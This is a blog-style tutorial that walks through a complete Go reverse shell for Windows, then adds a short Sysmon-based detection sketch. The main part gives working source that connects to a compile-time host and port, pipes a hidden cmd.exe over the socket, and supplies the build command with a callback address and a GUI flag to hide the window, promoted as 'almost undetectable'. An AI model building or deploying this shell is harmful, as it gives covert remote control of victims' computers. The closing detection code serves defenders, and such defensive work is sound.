Basic reverse shell in golang (almost undetectable, hide cmd window)

package main

import (
	"net"
	"os"
	"os/exec"
	"syscall"
)
  • net is required to establish a connection
  • os is required to call os.Exit()
  • os/exec is required to execute commands on the target machine
  • syscall contains an interface to the low-level operating system primitives
var connectString string

func main() {
	if len(connectString) == 0 {
		os.Exit(1)
	}
  • var connectString string is set at compile time; it holds the IP address and the port
conn, err := net.Dial("tcp", connectString)
if err != nil {
	os.Exit(1)
}
  • net.Dial connects to the address on the named network; in our case the address is the value of the connectString variable
cmd := exec.Command("cmd.exe")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
  • cmd := exec.Command("cmd.exe"): cmd represents an external command being prepared or run; exec.Command prepares the command cmd.exe, and nothing is executed until cmd.Run() is called
  • cmd.SysProcAttr is used to hide the cmd.exe window; this is the key to hiding our reverse shell, and we will need something else at compile time!
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
  • Redirects the inputs and outputs of this process to the open connection we initialized above in the conn variable.
cmd.Run()
  • cmd.Run() runs the command held in the cmd variable and waits for it to complete
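package main

import (
	"net"
	"os"
	"os/exec"
	"syscall"
)

// connectString is set at link time with -X (host:port).
var connectString string

func main() {
	if len(connectString) == 0 {
		os.Exit(1)
	}
	conn, err := net.Dial("tcp", connectString)
	if err != nil {
		os.Exit(1)
	}
	cmd := exec.Command("cmd.exe")
	// HideWindow is a Windows-only field of syscall.SysProcAttr.
	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	// Bind the shell's standard streams to the TCP connection.
	cmd.Stdin = conn
	cmd.Stdout = conn
	cmd.Stderr = conn
	cmd.Run()
}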
go build --ldflags "-H=windowsgui -X main.connectString=192.168.1.32:2233" reverse.go
  • ldflags passes options to the linker, which lets you change the value of variables at build time and introduce your own dynamic information into a binary
  • -H=windowsgui writes a "GUI binary" instead of a "console binary"
  • -X sets the value of a string variable at link time; it is followed by the package path to the variable and its new value
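
A defender's view of the program above, as an added example (not code from the original article): HideWindow and -H=windowsgui only suppress the visible window, while process-creation and network telemetry still record the connect-then-spawn sequence. The sketch correlates simplified Sysmon-style events (ID 3 network connection, ID 1 process create). The Event struct, the sample GUIDs, paths and addresses are constructed for illustration, and the input is assumed to be in time order.

```go
package main

import (
	"fmt"
	"strings"
)

// Event is a trimmed-down Sysmon record (1 = process create, 3 = network connection).
type Event struct {
	ID                                    int
	ProcessGuid, ParentProcessGuid, Image string
	CommandLine, Destination              string
}

// Constructed sample telemetry, oldest first. GUIDs, paths and addresses are invented.
var sample = []Event{
	{ID: 3, ProcessGuid: "{A1}", Image: `C:\Users\bob\Downloads\reverse.exe`, Destination: "192.0.2.10:2233"},
	{ID: 1, ProcessGuid: "{A2}", ParentProcessGuid: "{A1}", Image: `C:\Windows\System32\cmd.exe`, CommandLine: "cmd.exe"},
	{ID: 1, ProcessGuid: "{B2}", ParentProcessGuid: "{B1}", Image: `C:\Windows\System32\cmd.exe`, CommandLine: "cmd.exe"},
	{ID: 3, ProcessGuid: "{C1}", Image: `C:\Program Files\App\updater.exe`, Destination: "198.51.100.7:443"},
	{ID: 1, ProcessGuid: "{C2}", ParentProcessGuid: "{C1}", Image: `C:\Windows\System32\cmd.exe`, CommandLine: `cmd.exe /c del "C:\Temp\old.msi"`},
}

// Alert pairs a bare shell launch with its parent's earlier outbound connection.
type Alert struct{ Parent, Shell, Destination string }

// FindSocketShells flags cmd.exe started without arguments by a process that
// had already opened an outbound TCP connection.
func FindSocketShells(events []Event) []Alert {
	conns := map[string]Event{} // ProcessGuid -> most recent outbound connection
	var alerts []Alert
	for _, e := range events {
		switch e.ID {
		case 3:
			conns[e.ProcessGuid] = e
		case 1:
			parent, ok := conns[e.ParentProcessGuid]
			isCmd := strings.HasSuffix(strings.ToLower(e.Image), `\cmd.exe`)
			bare := len(strings.Fields(e.CommandLine)) == 1 // no /c or /k payload
			if ok && isCmd && bare {
				alerts = append(alerts, Alert{parent.Image, e.ProcessGuid, parent.Destination})
			}
		}
	}
	return alerts
}

func main() {
	fmt.Println(FindSocketShells(sample))
}
```

Only the first pair is flagged: the second shell has no networked parent and the third carries a /c payload, which is how installers and updaters normally call cmd.exe.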

Learn with Christian & Alix

Yoplux
